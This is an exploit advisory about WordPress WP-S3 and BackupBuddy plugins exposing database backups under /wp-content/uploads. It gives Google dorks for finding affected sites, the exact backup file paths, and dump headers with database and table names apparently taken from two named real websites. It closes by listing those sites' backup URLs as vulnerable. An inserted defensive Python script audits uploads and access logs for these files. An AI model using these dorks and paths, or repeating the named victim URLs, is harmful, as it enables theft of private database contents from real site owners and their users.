#################################################################################################
# Exploit Title : WordPress Ithemes-BackupBuddy Amazon WP-S3 Plugins 2.9 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 17/12/2018
# Vendor Homepage : ithemes.com/purchase/backupbuddy/ ~ wordpress.org/plugins/wp-s3/
# Software Download Link : downloads.wordpress.org/plugin/wp-s3.1.5.zip
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : WP-S3 1.5 Version - Ithemes-BackupBuddy 2.9 Version
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/uploads/wp-s3-database-backup.sql''
+ intext:''Powered by Shopify''
+ intext:© 2018, Holy Sparks Jewish Art & Books For Spiritual & Personal Development Powered by Shopify''
+ intext:''2015 © ALL RIGHTS RESERVED BY THE-SCHMIDT''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
WordPress Amazon S3 Plugin 1.5 and WordPress Ithemes-BackupBuddy 2.9
#################################################################################################
# Admin Panel Login Path :
/wp-login.php
# Exploit :
/wp-content/uploads/wp-s3-database-backup.sql
/wp-content/uploads/wp-s3-backups.zip
#################################################################################################
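The weakness above is a backup artifact written into the web-served uploads directory, so the defender-side questions are "do such files exist under my uploads tree?" and "has anyone already fetched them?". The following Python script is an added example, not part of the original advisory: it audits a list of upload file names for the two paths the advisory names and, as a generalization (my assumption, not from the advisory), for common dump/archive suffixes, and it scans access-log lines in Combined Log Format for requests that reached those files. The log lines embedded in the script are constructed samples.

```python
"""Defender-side checks for exposed WordPress backup artifacts (added example).

  audit_upload_names()   - which file names under wp-content/uploads are backups
  flag_backup_requests() - which access-log requests hit those files, and with
                           what HTTP status (200 = the dump was actually served)
"""
import re
from urllib.parse import unquote

# File names taken from the advisory above. Matching is done on the basename
# so that sites installed in a subdirectory (e.g. /blog/) are also covered.
BACKUP_NAMES = ("wp-s3-database-backup.sql", "wp-s3-backups.zip")

# Generalization: suffixes other backup plugins or manual exports leave behind.
# These are an assumption of this example, not something the advisory states.
BACKUP_SUFFIXES = (".sql", ".sql.gz", ".zip", ".tar.gz")

# Apache/nginx Combined Log Format: ip ident user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def is_backup_artifact(name: str) -> bool:
    """True if the basename is a known backup file or carries a dump/archive suffix."""
    base = name.rsplit("/", 1)[-1].lower()
    return base in BACKUP_NAMES or base.endswith(BACKUP_SUFFIXES)


def audit_upload_names(names):
    """Return, sorted, the names that must not be reachable through the web server."""
    return sorted(n for n in names if is_backup_artifact(n))


def flag_backup_requests(log_lines):
    """Return (client_ip, path, status) for every request that targeted a backup
    artifact under wp-content/uploads. Status 200 means the file was served;
    403/404 indicate a deny rule or removal was already in place."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not Combined Log Format; skip rather than guess
        # Drop the query string and undo percent-encoding before matching.
        path = unquote(m.group("path").split("?", 1)[0])
        if "/wp-content/uploads/" in path and is_backup_artifact(path):
            hits.append((m.group("ip"), path, int(m.group("status"))))
    return hits


def served_dumps(log_lines):
    """Subset of flag_backup_requests() where the server answered 200."""
    return [h for h in flag_backup_requests(log_lines) if h[2] == 200]


# Constructed sample log lines (RFC 5737 documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Dec/2018:10:01:22 +0000] "GET /wp-content/uploads/wp-s3-database-backup.sql HTTP/1.1" 200 5242880 "-" "curl/7.61.0"',
    '203.0.113.5 - - [17/Dec/2018:10:01:40 +0000] "GET /blog/wp-content/uploads/wp-s3-backups.zip HTTP/1.1" 403 199 "-" "curl/7.61.0"',
    '198.51.100.7 - - [17/Dec/2018:10:02:01 +0000] "GET /wp-content/uploads/2018/12/logo.png HTTP/1.1" 200 4213 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [17/Dec/2018:10:02:05 +0000] "GET /wp-login.php HTTP/1.1" 200 2931 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, status in flag_backup_requests(SAMPLE_LOG):
        print(f"{status} {ip} {path}")
    print("served:", [h[1] for h in served_dumps(SAMPLE_LOG)])
```

Feed `audit_upload_names()` the output of a directory walk over `wp-content/uploads` and `flag_backup_requests()` the web server's access log; any 200 hit means the database dump must be treated as disclosed (rotate the credentials and salts it contains). The lasting fix is to keep backups out of the document root, or to deny `.sql` and archive extensions under `uploads/` at the web-server layer so that a plugin writing there again cannot expose them.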
# Example SQL dump: some information and table names => holysparks.org
-- MySQL dump 10.13 Distrib 5.1.58, for unknown-linux-gnu (x86_64)
--
-- Host: localhost Database: raeshaga_wrd1
-- ------------------------------------------------------
-- Server version 5.1.58-community-log
-- Table structure for table `wp_StreamPad_Tracks`
-- Dumping data for table `wp_StreamPad_Tracks`
-- Table structure for table `wp_affiliates_banners_tbl`
-- Dumping data for table `wp_affiliates_banners_tbl`
-- Table structure for table `wp_affiliates_clickthroughs_tbl`
-- Dumping data for table `wp_affiliates_clickthroughs_tbl`
-- Table structure for table `wp_affiliates_leads_tbl`
-- Dumping data for table `wp_affiliates_leads_tbl`
-- Table structure for table `wp_affiliates_payouts_tbl`
-- Dumping data for table `wp_affiliates_payouts_tbl`
-- Table structure for table `wp_affiliates_sales_tbl`
-- Dumping data for table `wp_affiliates_sales_tbl`
-- Table structure for table `wp_affiliates_tbl`
-- Dumping data for table `wp_affiliates_tbl`
-- Table structure for table `wp_commentmeta`
-- Dumping data for table `wp_commentmeta`
-- Table structure for table `wp_comments`
-- Dumping data for table `wp_comments`
-- Table structure for table `wp_contact_form_7`
-- Dumping data for table `wp_contact_form_7`
-- Table structure for table `wp_ft_wpecards`
-- Dumping data for table `wp_ft_wpecards`
-- Table structure for table `wp_links`
-- Dumping data for table `wp_links`
-- Table structure for table `wp_options`
-- Dumping data for table `wp_options`
-- Dump completed....
################################################################################################
# Example SQL dump: information and table names => the-schmidt.com
-- MySQL dump 10.13 Distrib 5.1.60, for unknown-linux-gnu (x86_64)
--
-- Host: localhost Database: theschm1_blog
-- ------------------------------------------------------
-- Server version 5.1.60-community-log
-- Table structure for table `wp_PluginManager`
-- Dumping data for table `wp_PluginManager`
-- Table structure for table `wp_custom_fonts`
-- Dumping data for table `wp_custom_fonts`
-- Table structure for table `wp_cvg_gallery`
-- Dumping data for table `wp_cvg_gallery`
-- Table structure for table `wp_cvg_videos`
-- Dumping data for table `wp_cvg_videos`
-- Table structure for table `wp_download_status`
-- Dumping data for table `wp_download_status`
-- Table structure for table `wp_fancybox`
-- Dumping data for table `wp_fancybox`
-- Table structure for table `wp_item_category_associations`
-- Dumping data for table `wp_item_category_associations`
-- Table structure for table `wp_links`
-- Dumping data for table `wp_links`
-- Table structure for table `wp_ngg_album`
-- Dumping data for table `wp_ngg_album`
-- Table structure for table `wp_ngg_gallery`
-- Dumping data for table `wp_ngg_gallery`
-- Table structure for table `wp_ngg_pictures`
-- Dumping data for table `wp_ngg_pictures`
-- Table structure for table `wp_also_bought_product`
-- Dumping data for table `wp_also_bought_product`
-- Table structure for table `wp_blc_filters`
-- Dumping data for table `wp_blc_filters`
-- Table structure for table `wp_blc_instances`
-- Dumping data for table `wp_blc_instances`
-- Table structure for table `wp_blc_links`
-- Dumping data for table `wp_blc_links`
-- Table structure for table `wp_options`
-- Dumping data for table `wp_options`
-- Dump completed...
#################################################################################################
# Example Vulnerable Sites =>
[+] holysparks.org/wp-content/uploads/wp-s3-database-backup.sql
[+] the-schmidt.com/blog/wp-content/uploads/wp-s3-database-backup.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################